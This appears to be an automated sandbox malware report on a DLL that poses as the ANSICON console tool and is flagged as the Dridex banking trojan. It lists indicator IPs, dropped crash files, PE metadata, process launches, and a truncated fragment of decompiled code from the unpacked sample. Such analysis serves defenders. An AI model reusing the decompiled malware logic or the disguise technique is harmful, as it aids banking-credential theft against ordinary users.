HDC Information:	Successful, ratio: 99.8% (good quality ratio 96.3%) Quality average: 80.5% Quality standard deviation: 25.5%
HCA Information:	Successful, ratio: 92% Number of executed functions: 21 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, WerFault.exe, SgrmBroker.exe, svchost.exe

Simulations

Behavior and APIs

Time	Type	Description
23:36:50	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
159.203.93.122	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	6l18PHjcrE.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse
50.116.27.97	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	6l18PHjcrE.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	gsG7jGFk3I.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	9JXXdpfiQm.dll	Get hash	malicious	Browse	159.203.93.122
	t4KzTUSzkx.dll	Get hash	malicious	Browse	159.203.93.122
	POQ6m91rE7.dll	Get hash	malicious	Browse	159.203.93.122
	4ryCxciDFA.dll	Get hash	malicious	Browse	159.203.93.122
	9JXXdpfiQm.dll	Get hash	malicious	Browse	159.203.93.122
	t4KzTUSzkx.dll	Get hash	malicious	Browse	159.203.93.122
	POQ6m91rE7.dll	Get hash	malicious	Browse	159.203.93.122
	6l18PHjcrE.dll	Get hash	malicious	Browse	159.203.93.122
	4ryCxciDFA.dll	Get hash	malicious	Browse	159.203.93.122
LINODE-APLinodeLLCUS	gsG7jGFk3I.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	9JXXdpfiQm.dll	Get hash	malicious	Browse	50.116.27.97
	t4KzTUSzkx.dll	Get hash	malicious	Browse	50.116.27.97
	POQ6m91rE7.dll	Get hash	malicious	Browse	50.116.27.97
	4ryCxciDFA.dll	Get hash	malicious	Browse	50.116.27.97
	9JXXdpfiQm.dll	Get hash	malicious	Browse	50.116.27.97
	t4KzTUSzkx.dll	Get hash	malicious	Browse	50.116.27.97
	POQ6m91rE7.dll	Get hash	malicious	Browse	50.116.27.97
	6l18PHjcrE.dll	Get hash	malicious	Browse	50.116.27.97
	4ryCxciDFA.dll	Get hash	malicious	Browse	50.116.27.97

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_3aebf4f4b63c22f8e81111ea58d346011b6f5fc_160cf2be_1ad25a27\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	9244
Entropy (8bit):	3.761941567240768
Encrypted:	false
SSDEEP:	96:NbLXyyy9hA/C5Q56tpXIQcQ6c6n+hcEZcw3P+a+z+HbHgik6eugtYsaV9w72oNEs:oRHUb+hjbjMq/u7scS274Itb2o
MD5:	17DA3DA2F76B3AD56AA7D0FA984033BD
SHA1:	1D6203103A903428611C7F46FB723024174091B1
SHA-256:	232C9E7DF7C05E040B28D42ACF0609A3125AEE7ABBB46BFAADA48B34F82AD9C8
SHA-512:	3446F1DD2DFC748164A688BF8B286A5B9F2AD504AE2356B052994EE23E8726EAA5EA9D3C3D595FA22D2DA8043AA62DDB446730A82965D7FFC31A266506034518
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.3.3.7.4.2.1.7.9.5.4.9.4.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.7.d.0.7.1.e.c.-.d.6.2.b.-.4.5.4.f.-.b.7.a.a.-.7.2.3.9.9.0.5.a.8.b.7.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.0.4.b.c.0.5.5.-.7.6.3.5.-.4.7.2.9.-.b.c.a.d.-.e.3.2.d.a.e.6.1.8.0.c.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.8.8.-.0.0.0.1.-.0.0.1.7.-.4.f.c.8.-.4.0.7.2.a.f.3.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.4././.0.4.:.1.0.:.5.0.:.5.4.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B47.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Apr 20 06:37:00 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	36446
Entropy (8bit):	2.2696162828360498
Encrypted:	false
SSDEEP:	192:AMmV5Zd9r8d1EDuYZfWP+8PM6TyE1iOm1ucGI:fA5X9r8d1ECi/KM6Ty+QyI
MD5:	98B20AB5414609F8F6C46ED45AE9478C
SHA1:	0F573701D0D2A778CC3A043BBB4561121F372B92
SHA-256:	8F5C912295DA4857649ADDA5007581FC51B86BB0E79214F9909CA5A76864ABFB
SHA-512:	2A0C8FA629E9F2294368D968FF7896498CF079D7E562B4BC14F2455F0D283EC7C431B6904B49AB03267D70A539FEF45AD062601FFA13F12F49C93FFC50CA74E3
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........v~`...................U...........B..............GenuineIntelW...........T...........Xv~`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3598.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8366
Entropy (8bit):	3.689598551563396
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiIml6UK56YgDSUumgmfAS1HCpBR89binYsfpWm:RrlsNit6UK56YUSUumgmfAS1DinLfR
MD5:	3D24220609ADC4776B9AF8367AF2D67A
SHA1:	BE6A948CF2D97287A0F61E3F6149E6610852D6FD
SHA-256:	C31D482357ACC02286820A817B2CC9859E76634D1B21671CB18A62623D70BCC7
SHA-512:	E89C8CE2AE9F9108D4B3783AAD46F5BB7FCCB46FCF96BBAEF20AE537C89E8736E5A75018C8F9CE0DBC296C22D7790A59D39BE4C2B34C694442DA119195083996
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.1.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CAC.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4658
Entropy (8bit):	4.427855153855926
Encrypted:	false
SSDEEP:	48:cvIwSD8zslJgtWI93/WSC8BNT8fm8M4JVpNF1+q8v7ptIKcQIcQw6Urgd:uITf/ouSN4JdKMKkw68gd
MD5:	F3DCC0C60B9F7BCC562A3F0B35CF73AA
SHA1:	956A0AAED7AB21B390C8AE9CA86197D291EA2BFA
SHA-256:	388D99A2CA96C52D2EC649BA49F8099C1E2B1457ED87E44F14E0CC6BBB74FE76
SHA-512:	B220C2FC792B4D83D67AAA142849C91966781312C6F175E2B8214F4EAFA0284F23898754F2D7062F5B0678107B6E90761C35F3FE9A90208CC1A69DCEB12776F6
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="954227" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.548557274908702
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RuRxpMUPN7.dll
File size:	163840
MD5:	f6a73ad1c962b6d3d979066d37da71b5
SHA1:	c19b72b1b07a8065f2a62be97cb1cccfb1d5b93f
SHA256:	8d357ea7f4cbfcbbd9af86a34c421b7011204c83efa788b2527a79f9c464f287
SHA512:	d91d9b8de5601bb3f419ece53394fee115b5b7ff4fdf520acd3963fba03c25d6fd5ae38cc5fee79bd9afd75da34e93413b16d8d31fd45b1385f2d5047bfb1850
SSDEEP:	3072:WWX2IjzzpM+PncPeY8+O3AU3HRIHPh3UGfXy0BHNkIv/ScbQQ2y0iNM0+y+N0tc:W42IfzNPnoeY8j3AsHGPXpHNj6rByM3
File Content Preview:	MZ......................@...........................................[}..[}..[}..[}...}..@.2..\|..=.T..}....S.z\|..@..._}..\|...T\|..V/C..\|..V/E..\|..Rich[}..............PE..L.....}`...........!.........f.......D.......P....@....................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x424410
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x607DE4E2 [Mon Apr 19 20:15:30 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	b84fd50f2389cfd5bd83e2cf062986d1

Entrypoint Preview

Instruction
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
sub eax, 00002233h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
cmp edx, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
je 00007F30E8A3F07Bh
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1001	0x0	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2768c	0x59	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2d000	0x14c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x25040	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2356e	0x23600	False	0.761560015459	data	7.55877156847	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0x2842	0x2a00	False	0.791573660714	data	7.53164670284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x28000	0x3588	0x1600	False	0.783380681818	MMDF mailbox	7.34765964879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x340	0x400	False	0.390625	data	2.73456990044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2d000	0x14c	0x200	False	0.62890625	data	4.21021599876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2c060	0x2e0	data	English	United States

Imports

DLL	Import
KERNEL32.dll	CloseHandle, OpenSemaphoreW, LoadLibraryExA, GetModuleHandleW, OutputDebugStringA, GetProfileSectionW
OPENGL32.dll	glTexSubImage1D
ole32.dll	CreateStreamOnHGlobal
USER32.dll	TranslateMessage
ADVAPI32.dll	RegLoadAppKeyW

Version Infos

Description	Data
LegalCopyright	Freeware
InternalName	ANSI32
FileVersion	1.66
CompanyName	Jason Hood
Comments	http://ansicon.adoxa.vze.com/
ProductName	ANSICON
ProductVersion	1.66
FileDescription	ANSI Console
OriginalFilename	ANSI32.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 1416 Parent PID: 5676

General

Start time:	23:36:08
Start date:	19/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll'
Imagebase:	0xba0000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4512 Parent PID: 1416

General

Start time:	23:36:08
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1
Imagebase:	0xac0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4356 Parent PID: 4512

General

Start time:	23:36:09
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1
Imagebase:	0x8e0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6692 Parent PID: 1416

General

Start time:	23:36:50
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',ReadLogRecord
Imagebase:	0x8e0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000008.00000002.511726396.0000000072AD1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6784 Parent PID: 1416

General

Start time:	23:36:52
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 440
Imagebase:	0xe30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 4356 Parent PID: 4512 rundll32.exeCOMMON

Executed Functions

Function 72AE07CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E72AE07CC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t152;
				void* _t155;
				signed char* _t156;
				char _t159;
				intOrPtr* _t163;
				void* _t177;
				intOrPtr _t186;
				char _t187;
				void* _t192;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t208;
				void* _t209;
				void* _t211;
				void* _t212;
				void* _t219;
				void* _t232;
				void* _t234;
				void* _t237;
				void* _t240;
				void* _t243;
				void* _t246;
				void* _t250;
				void* _t254;
				void* _t255;
				void* _t257;
				long _t258;
				void* _t261;
				void* _t264;
				int _t267;
				void* _t268;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t278;
				int _t280;
				intOrPtr* _t284;
				signed char _t288;
				signed char _t289;
				signed int _t293;
				void* _t314;
				void* _t319;
				void* _t355;
				void* _t364;
				void* _t369;
				void* _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t385;
				void* _t392;
				signed int _t397;
				intOrPtr* _t400;
				void* _t403;
				signed int _t405;
				void* _t407;
				void* _t408;
				void* _t413;
				intOrPtr* _t417;
				void* _t419;
				void** _t421;
				void* _t422;
				void* _t423;
				void* _t424;

				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t423 = _t422 - 0x1e0;
				_t407 = __ecx;
				_t152 =  *0x72aed1f8;
				if(_t152 == 0x16a9e13a) {
					_t152 = E72AE3558(0x30);
					 *0x72aed1f8 = _t152;
				}
				if( *((char*)(_t152 + 0xb)) == 0 || _t407 != 0) {
					_t408 = _t423 + 0x48;
					E72AE35D4(_t408, 0, 0x11c);
					_t424 = _t423 + 0xc;
					 *((intOrPtr*)(_t424 + 0x48)) = 0x11c;
					_t155 = E72AE2F94(0x4bcc7cba, 0xa7920a3, 0x4bcc7cba, 0x4bcc7cba);
					if(_t155 == 0) {
						_t395 =  *0x72aed1f8;
						_t156 = _t424 + 0x4c;
						_t288 =  *_t156;
						 *(_t395 + 8) = _t288;
						_t289 = _t156[4];
						 *(_t395 + 9) = _t289;
						__eflags = _t156[0x116] - 1;
						_t389 =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xa)) = _t156[0x110];
						 *(_t395 + 4) =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xc)) = 0 | _t156[0x116] != 0x00000001;
						 *_t395 = (_t289 & 0x000000ff) + ((_t288 & 0x000000ff) << 4) - 0x50;
						_t159 = E72AE1094(_t395);
						 *(_t424 + 0x198) = 0;
						 *((char*)( *0x72aed1f8 + 0xb)) = _t159;
						_t355 = E72AE2F94(0xd0443458, 0xd8ece5ad, _t159, _t159);
						__eflags = _t355;
						if(_t355 == 0) {
							L12:
							__eflags = 0;
							 *((char*)( *0x72aed1f8 + 0x28)) = 0;
							_t163 = E72AE07CC(0x72aed1f8, 0, _t389, _t395);
							__eflags =  *_t163 - 0x10;
							if( *_t163 >= 0x10) {
								_t293 = 6;
								memcpy(_t424 + 0x164, 0x72aebc80, _t293 << 2);
								_t424 = _t424 + 0xc;
								_t392 = 0x72aebc80 + _t293 + _t293;
								 *((intOrPtr*)(_t424 + 0x1c)) = 0;
								E72ADF620(_t424 + 0x24, 0);
								_t397 = 0;
								__eflags = 0;
								do {
									E72ADF8C4(_t424 + 0x24, E72ADF568(_t424 + 0x20) + 4);
									 *((intOrPtr*)(E72ADF558(_t424 + 0x24, E72ADF568(_t424 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t424 + 0x164 + _t397 * 4));
									_t397 = _t397 + 1;
									 *((intOrPtr*)(_t424 + 0x1c)) =  *((intOrPtr*)(_t424 + 0x1c)) + 1;
									__eflags = _t397 - 6;
								} while (_t397 < 6);
								_push(0);
								E72AE54EC(_t424 + 0xc, _t424 + 0x1c, 0x80000002);
								E72ADF6F0(_t424 + 0x20);
								E72AE551C(_t424 + 8, _t424 + 0x1c0, 0x5411b30);
								_t177 = E72AE57D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c0)));
								_t398 = _t177;
								E72ADE054(_t424 + 0x1c0);
								__eflags = _t177;
								if(_t177 != 0) {
									E72AE551C(_t424 + 8, _t424 + 0x1c8, 0xdb1d9b48);
									_t413 = E72AE57D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c8)));
									E72ADE054(_t424 + 0x1c8);
									_t398 = _t424 + 0x1d0;
									E72AE551C(_t424 + 8, _t424 + 0x1d0, 0xf3453dd0);
									_t392 = E72AE57D0(_t424 + 4, __eflags,  *(_t424 + 0x1d0));
									E72ADE054(_t424 + 0x1d0);
									__eflags = _t413;
									if(_t413 != 0) {
										__eflags = _t413 - 5;
										if(_t413 != 5) {
											__eflags = _t413 - 2;
											if(_t413 != 2) {
												goto L58;
											} else {
												__eflags = _t392 - 1;
												if(_t392 != 1) {
													goto L58;
												} else {
													E72ADD098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t375 =  *(_t424 + 4);
														__eflags = _t375;
														if(_t375 == 0) {
															L53:
															_t237 = 1;
														} else {
															__eflags = _t375 - 0xffffffff;
															if(_t375 != 0xffffffff) {
																_t237 = 0;
																__eflags = 0;
															} else {
																goto L53;
															}
														}
														__eflags = _t237;
														if(_t237 == 0) {
															E72AE54C4(_t375);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 5;
												}
											}
										} else {
											__eflags = _t392;
											if(_t392 != 0) {
												__eflags = _t392 - 1;
												if(_t392 == 1) {
													E72ADD098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t376 =  *(_t424 + 4);
														__eflags = _t376;
														if(_t376 == 0) {
															L108:
															_t240 = 1;
														} else {
